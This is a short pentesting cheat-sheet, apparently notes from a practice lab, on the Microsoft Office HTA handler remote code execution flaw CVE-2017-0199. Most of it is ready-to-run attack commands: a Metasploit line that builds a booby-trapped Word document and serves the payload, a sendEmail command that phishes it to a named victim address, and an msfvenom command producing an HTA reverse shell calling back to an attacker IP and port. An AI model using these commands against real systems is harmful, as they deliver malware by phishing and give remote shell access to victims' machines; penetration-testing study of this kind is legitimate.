HTA Handler RCE (CVE-2017-0199)

rce, windows, foothold

Overview #

  1. Attacker sends document with OLE to victim
  2. Victim clicks document (or download attachment from email)
  3. Document sends GET request to attacker IP to download a malicious HTA file. Once this file is downloaded, victim machine executes it due to logic bug of mshta.exe.

Exploits #

Tools #

# Generate document and run webserver
msfconsole -x "use windows/fileformat/office_word_hta; set srvhost tun0; set filename Procedures.doc; set lhost tun0; run"

# Send generated document to victim and wait for the reverse
# connection in metasploit
sendEmail -t nico@megabank.com -f hacker@kali.com -s reel:25 -u Procedures -o tls=no -a /home/kali/.msf4/local/Procedures.doc -m "See attachment for procedures"

Troubleshooting #

The python exploit in github didnt worked for me. When I tried to see in wireshark the network connections, I saw that victim did a GET request to attacker, but attacker didnt respond back. Probably there is something wrong on http server implemention?

From other writeups, they didnt use the http server that comes up with the exploit kit but instead they used their own http server.

Alternatives #

# msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f hta-psh -o msfv.hta

# via nishang
https://www.youtube.com/watch?v=ob9SgtFm6_g&t=794s

References #